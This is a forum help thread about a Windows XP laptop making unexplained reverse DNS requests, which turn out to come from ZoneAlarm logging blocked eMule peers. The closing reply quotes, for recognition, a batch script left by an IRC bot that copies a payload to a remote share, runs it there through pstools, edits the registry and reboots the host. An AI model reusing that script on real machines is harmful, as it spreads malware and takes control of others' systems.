Selcon
asked on
Suspicious DNS activity
Hello,
I'm running Win XP Pro on a IBM Thinkpad T30. Recently, my laptop started performing internet accesses even though there should be none. When I reboot my system (to start afresh), my Zonealarm shows continuous internet accesses from scvhost.exe (Generic Host Process under win32). I fired up Ethereal and found tons of reverse DNS requests to wierd addresses such as pc-62-30-198-107-sm.blueyo
I've tried running fport from foundstone, but it always returns an empty table/list.
Any ideas what is going on? and how to fix it?
Thanks!
I'm running Win XP Pro on a IBM Thinkpad T30. Recently, my laptop started performing internet accesses even though there should be none. When I reboot my system (to start afresh), my Zonealarm shows continuous internet accesses from scvhost.exe (Generic Host Process under win32). I fired up Ethereal and found tons of reverse DNS requests to wierd addresses such as pc-62-30-198-107-sm.blueyo
I've tried running fport from foundstone, but it always returns an empty table/list.
Any ideas what is going on? and how to fix it?
Thanks!
liddler
First guess would be some spyware or virus. Download and run the excellent and free ad-aware (http://www.lavasoftusa.com/. To check for spyware, and run your AV software with the latest definitions.
ASKER
I also did ran ad-aware (with latest refupdate) as well as Norton Antivirus scan (with latest db) but both turned up nothing
What is running when you show the tasklist? Also, did you try running msconfig, and checking the startup tab, and turning off programs from starting up.
Thanks,
Jackson
Thanks,
Jackson
ASKER
Yes I recently went through the startup programs in the registry and msconfig/startup tab.
Here's a dump from running tasklist (initial dump to check formatting)
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 20 K
System 4 Console 0 36 K
smss.exe 636 Console 0 52 K
Here's a dump from running tasklist (initial dump to check formatting)
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 20 K
System 4 Console 0 36 K
smss.exe 636 Console 0 52 K
ASKER
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 20 K
System 4 Console 0 36 K
smss.exe 636 Console 0 52 K
csrss.exe 688 Console 0 3,036 K
winlogon.exe 712 Console 0 576 K
services.exe 756 Console 0 1,068 K
lsass.exe 768 Console 0 1,284 K
ibmpmsvc.exe 956 Console 0 160 K
svchost.exe 1004 Console 0 1,224 K
svchost.exe 1112 Console 0 7,404 K
svchost.exe 1364 Console 0 1,404 K
svchost.exe 1448 Console 0 764 K
spoolsv.exe 1592 Console 0 792 K
CDAC11BA.EXE 1772 Console 0 224 K
defwatch.exe 1800 Console 0 264 K
Runservice.exe 1824 Console 0 264 K
rtvscan.exe 1840 Console 0 2,924 K
QCONSVC.EXE 1864 Console 0 264 K
svchost.exe 1916 Console 0 1,196 K
vsmon.exe 1932 Console 0 3,656 K
explorer.exe 868 Console 0 28,048 K
MSGSYS.EXE 1300 Console 0 208 K
SynTPLpr.exe 276 Console 0 452 K
SynTPEnh.exe 360 Console 0 864 K
rundll32.exe 468 Console 0 712 K
TPHKMGR.exe 536 Console 0 836 K
IMWEBSTA.exe 668 Console 0 1,008 K
NDetect.exe 732 Console 0 1,052 K
vptray.exe 1092 Console 0 868 K
dpps2.exe 1492 Console 0 1,140 K
evntsvc.exe 1548 Console 0 120 K
ctfmon.exe 1560 Console 0 1,940 K
kstatus.exe 1028 Console 0 1,532 K
zonealarm.exe 216 Console 0 3,196 K
iexplore.exe 4004 Console 0 19,200 K
iexplore.exe 2100 Console 0 17,228 K
cmd.exe 3224 Console 0 1,628 K
tasklist.exe 660 Console 0 4,336 K
wmiprvse.exe 3616 Console 0 5,012 K
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 20 K
System 4 Console 0 36 K
smss.exe 636 Console 0 52 K
csrss.exe 688 Console 0 3,036 K
winlogon.exe 712 Console 0 576 K
services.exe 756 Console 0 1,068 K
lsass.exe 768 Console 0 1,284 K
ibmpmsvc.exe 956 Console 0 160 K
svchost.exe 1004 Console 0 1,224 K
svchost.exe 1112 Console 0 7,404 K
svchost.exe 1364 Console 0 1,404 K
svchost.exe 1448 Console 0 764 K
spoolsv.exe 1592 Console 0 792 K
CDAC11BA.EXE 1772 Console 0 224 K
defwatch.exe 1800 Console 0 264 K
Runservice.exe 1824 Console 0 264 K
rtvscan.exe 1840 Console 0 2,924 K
QCONSVC.EXE 1864 Console 0 264 K
svchost.exe 1916 Console 0 1,196 K
vsmon.exe 1932 Console 0 3,656 K
explorer.exe 868 Console 0 28,048 K
MSGSYS.EXE 1300 Console 0 208 K
SynTPLpr.exe 276 Console 0 452 K
SynTPEnh.exe 360 Console 0 864 K
rundll32.exe 468 Console 0 712 K
TPHKMGR.exe 536 Console 0 836 K
IMWEBSTA.exe 668 Console 0 1,008 K
NDetect.exe 732 Console 0 1,052 K
vptray.exe 1092 Console 0 868 K
dpps2.exe 1492 Console 0 1,140 K
evntsvc.exe 1548 Console 0 120 K
ctfmon.exe 1560 Console 0 1,940 K
kstatus.exe 1028 Console 0 1,532 K
zonealarm.exe 216 Console 0 3,196 K
iexplore.exe 4004 Console 0 19,200 K
iexplore.exe 2100 Console 0 17,228 K
cmd.exe 3224 Console 0 1,628 K
tasklist.exe 660 Console 0 4,336 K
wmiprvse.exe 3616 Console 0 5,012 K
I'm curious to see the results of "netstat -na" after a clean boot, to see who (if anyone) your computer is talking to.
Cheers,
Jason
Cheers,
Jason
At the time you checked your process list, did you have a command shell open? I see cmd.exe in there, but did YOU open it? Hackers often "shovel" shells to themselves using tools like netcat bound to cmd.exe (so they have total control over your computer remotely). If you didn't launch cmd.exe, this would seem likely. In that case, Jason Deckard is right, run netstat and see what ports are listening. It sounds fishy to me...
Also, some of the mystery addresses appear to be dial-in addresses which would suggest that the activity isn't advertisement related.
Also, some of the mystery addresses appear to be dial-in addresses which would suggest that the activity isn't advertisement related.
yeah, thank the lord for the monitoring/closings of a ZA product.
blueyonder: http://www.bygames.com/
What is CDAC11BA.EXE? It looks similar to one of their code acronymns. And, why... are you running so many explorers and dos programs at plain simple startup?
Did you install a game and enable networking, phone access, and register via dialup?
blueyonder: http://www.bygames.com/
What is CDAC11BA.EXE? It looks similar to one of their code acronymns. And, why... are you running so many explorers and dos programs at plain simple startup?
Did you install a game and enable networking, phone access, and register via dialup?
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
to newyhouse: yes, i opened the command window to run the tasklist command
to sunbow: two IE windows were opened at that time, one to the experts-exchange website and another to google. Nope, didnt install any games recently.
to jackson:
Here is a dump of netstat -an currently without turning everything off (which i hate to do :). The suspicious DNS requests are still continuing right now when I am dumping the netstat -an results.
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1920 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:1027 *:*
UDP 0.0.0.0:1086 *:*
UDP 0.0.0.0:38037 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1790 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.0.69:123 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
UDP 192.168.0.69:1900 *:*
to sunbow: two IE windows were opened at that time, one to the experts-exchange website and another to google. Nope, didnt install any games recently.
to jackson:
Here is a dump of netstat -an currently without turning everything off (which i hate to do :). The suspicious DNS requests are still continuing right now when I am dumping the netstat -an results.
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1920 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:1027 *:*
UDP 0.0.0.0:1086 *:*
UDP 0.0.0.0:38037 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1790 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.0.69:123 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
UDP 192.168.0.69:1900 *:*
ASKER
192.168.0.69 is my internal IP address of my laptop by the way, i'm running my home network through a software NAT with a DSL provider (single ip). The gateway (just running the software NAT) is 192.168.0.1
ASKER
Ok, I removed everything under the startup tab in msconfig, except for zonealarm and norton antivirus. Havent removed the services yet, but this is what i get. The reverse DNS activity is still continuing, and here's a dump of netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:38037 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.0.69:123 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
UDP 192.168.0.69:1900 *:*
and here's a dump of tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 20 K
System 4 Console 0 224 K
smss.exe 628 Console 0 344 K
csrss.exe 684 Console 0 3,976 K
winlogon.exe 708 Console 0 2,340 K
services.exe 752 Console 0 2,916 K
lsass.exe 764 Console 0 5,296 K
ibmpmsvc.exe 948 Console 0 1,160 K
svchost.exe 992 Console 0 2,796 K
svchost.exe 1100 Console 0 19,820 K
svchost.exe 1360 Console 0 1,972 K
svchost.exe 1372 Console 0 3,376 K
spoolsv.exe 1636 Console 0 6,056 K
defwatch.exe 1820 Console 0 1,384 K
Runservice.exe 1844 Console 0 1,424 K
rtvscan.exe 1904 Console 0 10,488 K
QCONSVC.EXE 1944 Console 0 1,420 K
svchost.exe 1972 Console 0 2,676 K
vsmon.exe 1992 Console 0 5,532 K
MSGSYS.EXE 552 Console 0 2,100 K
explorer.exe 1084 Console 0 24,084 K
vptray.exe 2044 Console 0 6,048 K
msconfig.exe 1756 Console 0 5,040 K
kstatus.exe 584 Console 0 2,828 K
zonealarm.exe 1136 Console 0 7,316 K
cmd.exe 1656 Console 0 1,572 K
tasklist.exe 1488 Console 0 3,912 K
wmiprvse.exe 1164 Console 0 5,032 K
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:38037 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.0.69:123 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
UDP 192.168.0.69:1900 *:*
and here's a dump of tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 20 K
System 4 Console 0 224 K
smss.exe 628 Console 0 344 K
csrss.exe 684 Console 0 3,976 K
winlogon.exe 708 Console 0 2,340 K
services.exe 752 Console 0 2,916 K
lsass.exe 764 Console 0 5,296 K
ibmpmsvc.exe 948 Console 0 1,160 K
svchost.exe 992 Console 0 2,796 K
svchost.exe 1100 Console 0 19,820 K
svchost.exe 1360 Console 0 1,972 K
svchost.exe 1372 Console 0 3,376 K
spoolsv.exe 1636 Console 0 6,056 K
defwatch.exe 1820 Console 0 1,384 K
Runservice.exe 1844 Console 0 1,424 K
rtvscan.exe 1904 Console 0 10,488 K
QCONSVC.EXE 1944 Console 0 1,420 K
svchost.exe 1972 Console 0 2,676 K
vsmon.exe 1992 Console 0 5,532 K
MSGSYS.EXE 552 Console 0 2,100 K
explorer.exe 1084 Console 0 24,084 K
vptray.exe 2044 Console 0 6,048 K
msconfig.exe 1756 Console 0 5,040 K
kstatus.exe 584 Console 0 2,828 K
zonealarm.exe 1136 Console 0 7,316 K
cmd.exe 1656 Console 0 1,572 K
tasklist.exe 1488 Console 0 3,912 K
wmiprvse.exe 1164 Console 0 5,032 K
ASKER
Alright, I have stopped all services except for
DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services
The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.
This is the current netstat -an output
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1026 *:*
UDP 127.0.0.1:1067 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
and this is the current tasklist output (i've removed things such as cmd.exe, regedit.exe, etc. those which werent present until i ran them)
System Idle Process 0 0 20 K
System 4 0 128 K
smss.exe 628 0 232 K
csrss.exe 684 0 2,860 K
winlogon.exe 708 0 2,596 K
services.exe 752 0 2,648 K
lsass.exe 764 0 1,268 K
ibmpmsvc.exe 948 0 712 K
svchost.exe 992 0 2,348 K
svchost.exe 1100 0 13,648 K
svchost.exe 1360 0 1,708 K
QCONSVC.EXE 1944 0 948 K
vsmon.exe 1992 0 4,852 K
explorer.exe 1084 0 25,376 K
zonealarm.exe 1136 0 2,876 K
mmc.exe 1076 0 13,612 K
svchost.exe 212 0 2,712 K
wmiprvse.exe 1088 0 4,300 K
DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services
The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.
This is the current netstat -an output
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1026 *:*
UDP 127.0.0.1:1067 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
and this is the current tasklist output (i've removed things such as cmd.exe, regedit.exe, etc. those which werent present until i ran them)
System Idle Process 0 0 20 K
System 4 0 128 K
smss.exe 628 0 232 K
csrss.exe 684 0 2,860 K
winlogon.exe 708 0 2,596 K
services.exe 752 0 2,648 K
lsass.exe 764 0 1,268 K
ibmpmsvc.exe 948 0 712 K
svchost.exe 992 0 2,348 K
svchost.exe 1100 0 13,648 K
svchost.exe 1360 0 1,708 K
QCONSVC.EXE 1944 0 948 K
vsmon.exe 1992 0 4,852 K
explorer.exe 1084 0 25,376 K
zonealarm.exe 1136 0 2,876 K
mmc.exe 1076 0 13,612 K
svchost.exe 212 0 2,712 K
wmiprvse.exe 1088 0 4,300 K
ASKER
Alright, I have stopped all services except for
DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services
The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.
This is the current netstat -an output
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1026 *:*
UDP 127.0.0.1:1067 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
and this is the current tasklist output (i've removed things such as cmd.exe, regedit.exe, etc. those which werent present until i ran them)
System Idle Process 0 0 20 K
System 4 0 128 K
smss.exe 628 0 232 K
csrss.exe 684 0 2,860 K
winlogon.exe 708 0 2,596 K
services.exe 752 0 2,648 K
lsass.exe 764 0 1,268 K
ibmpmsvc.exe 948 0 712 K
svchost.exe 992 0 2,348 K
svchost.exe 1100 0 13,648 K
svchost.exe 1360 0 1,708 K
QCONSVC.EXE 1944 0 948 K
vsmon.exe 1992 0 4,852 K
explorer.exe 1084 0 25,376 K
zonealarm.exe 1136 0 2,876 K
mmc.exe 1076 0 13,612 K
svchost.exe 212 0 2,712 K
wmiprvse.exe 1088 0 4,300 K
DNS Client
Windows management instrumentation
Event Log
IBM PM Service
Plug and Play
QCONSVB
RPC
Security Accounts Manager
TrueVector Monitor (Zonealarm)
Windows Audio
terminal services
The first two (DNS and mgnt instru) can be stopped, but stopping DNS will not 'solve' the problem, and management instrumentation has lots of warnings against stopping it.
The rest of the services cannot be stopped.
This is the current netstat -an output
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 192.168.0.69:139 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1026 *:*
UDP 127.0.0.1:1067 *:*
UDP 192.168.0.69:137 *:*
UDP 192.168.0.69:138 *:*
and this is the current tasklist output (i've removed things such as cmd.exe, regedit.exe, etc. those which werent present until i ran them)
System Idle Process 0 0 20 K
System 4 0 128 K
smss.exe 628 0 232 K
csrss.exe 684 0 2,860 K
winlogon.exe 708 0 2,596 K
services.exe 752 0 2,648 K
lsass.exe 764 0 1,268 K
ibmpmsvc.exe 948 0 712 K
svchost.exe 992 0 2,348 K
svchost.exe 1100 0 13,648 K
svchost.exe 1360 0 1,708 K
QCONSVC.EXE 1944 0 948 K
vsmon.exe 1992 0 4,852 K
explorer.exe 1084 0 25,376 K
zonealarm.exe 1136 0 2,876 K
mmc.exe 1076 0 13,612 K
svchost.exe 212 0 2,712 K
wmiprvse.exe 1088 0 4,300 K
ASKER
the troublesome thing is that every application on the system makes DNS requests through svchost.exe, and I have no idea how to make svchost report which application is making those requests or who it is returning the results to.
from the looks of the processes left in the tasklist (is there some way a process can hide from tasklist display?), it seems that i have a trojaned program
from the looks of the processes left in the tasklist (is there some way a process can hide from tasklist display?), it seems that i have a trojaned program
ASKER
ok, i've found the source of the problem
ZoneAlarm was the one that's making the reverse DNS requests. It was blocking lots of packets directed to my laptop and resolving the source ips to display the hostname in the alert logs
and the reason i was getting so many packets was because I used to run eMule (a p2p program) and apparantly eMule clients cache lists of ips that have the file they want and they just keep probing to see if the client is alive.
Thanks for all the help pple!
(should i just award the points to whoever did the most work?)
ZoneAlarm was the one that's making the reverse DNS requests. It was blocking lots of packets directed to my laptop and resolving the source ips to display the hostname in the alert logs
and the reason i was getting so many packets was because I used to run eMule (a p2p program) and apparantly eMule clients cache lists of ips that have the file they want and they just keep probing to see if the client is alive.
Thanks for all the help pple!
(should i just award the points to whoever did the most work?)
Selcon,
It seems *you* did most of the work :)
If you're taking suggestions, I think JacksonGalloway is most deserving of your points.
It seems *you* did most of the work :)
If you're taking suggestions, I think JacksonGalloway is most deserving of your points.
I'd sure like to know where we can get a handy list of those services myself, especially for the prime tow mfr's (MS, IBM). ZoneAlarm is at least readable, it's the real name of the product.
ASKER
Yup.
It is actually interesting because since all apps does DNS through svchost, which makes it very hard to track down the culprit, esp if it could use DNS requests/replies to hide information, maybe with a special DNS server.
It is actually interesting because since all apps does DNS through svchost, which makes it very hard to track down the culprit, esp if it could use DNS requests/replies to hide information, maybe with a special DNS server.
okkk.. SCVHOST is NOT a Microsoft installed service. SVCHOST is. SCVHOST will look like a Green U when pulled up in a search window. To remove this its a very long and hard process. Its a IRC bot dropped in on your local system and forcing a FTP server to be run. It is accompanied by many if not 10 or 20 other files which can be thrown in multiple places. Most places could be the following from what i have seen
C:\Winnt\System32\Drivers\
c:\Winnt\Repair\
C:\Winnt\System\dump\ or Temp\
And others. You can locate it by just searching for the file SCVHOST. but do not delete until you goto that directory and find a batch file (*.BAT) in the directory. It will probably have a file called Profile or IrOffer. If you find a BAT file in the directory and open it with notepad. You will probably see something like the following.
mkdir \\%1\azkc\winnt\repair\iro
mkdir \\%1\azkc\winnt\repair\iro
copy C:\iro \\%1\azkc\winnt\repair\iro
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrol
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrol
C:\pstools\psshutdown -t 2 -r \\%1
If No Critical Errors Then %1 is ROOTED...
If this is found then you have been "Rooted" by some IRC junkie who is trying to serve files. You will see about 10 files like the following:
cygwin1.dll
netlog.exe
pkzip.exe
reg.exe
sample.config
ssleay32.dll
sysbk.exe
tzolibr.dll
Some of the files can be renamed and will be by the attacker who planted them. But the .Config is a definite since IrOffer needs that as its extension.
If anyone needs any help just throw me an email back and i will be glad to walk anyone through the process in removing these.
Thanks,
Chris Allen
aka ScriptJunkie
C:\Winnt\System32\Drivers\
c:\Winnt\Repair\
C:\Winnt\System\dump\ or Temp\
And others. You can locate it by just searching for the file SCVHOST. but do not delete until you goto that directory and find a batch file (*.BAT) in the directory. It will probably have a file called Profile or IrOffer. If you find a BAT file in the directory and open it with notepad. You will probably see something like the following.
mkdir \\%1\azkc\winnt\repair\iro
mkdir \\%1\azkc\winnt\repair\iro
copy C:\iro \\%1\azkc\winnt\repair\iro
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog
C:\pstools \\%1 -s c:\winnt\repair\iro\netlog
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrol
C:\pstools \\%1 -s c:\winnt\repair\iro\reg update hklm\system\currentcontrol
C:\pstools\psshutdown -t 2 -r \\%1
If No Critical Errors Then %1 is ROOTED...
If this is found then you have been "Rooted" by some IRC junkie who is trying to serve files. You will see about 10 files like the following:
cygwin1.dll
netlog.exe
pkzip.exe
reg.exe
sample.config
ssleay32.dll
sysbk.exe
tzolibr.dll
Some of the files can be renamed and will be by the attacker who planted them. But the .Config is a definite since IrOffer needs that as its extension.
If anyone needs any help just throw me an email back and i will be glad to walk anyone through the process in removing these.
Thanks,
Chris Allen
aka ScriptJunkie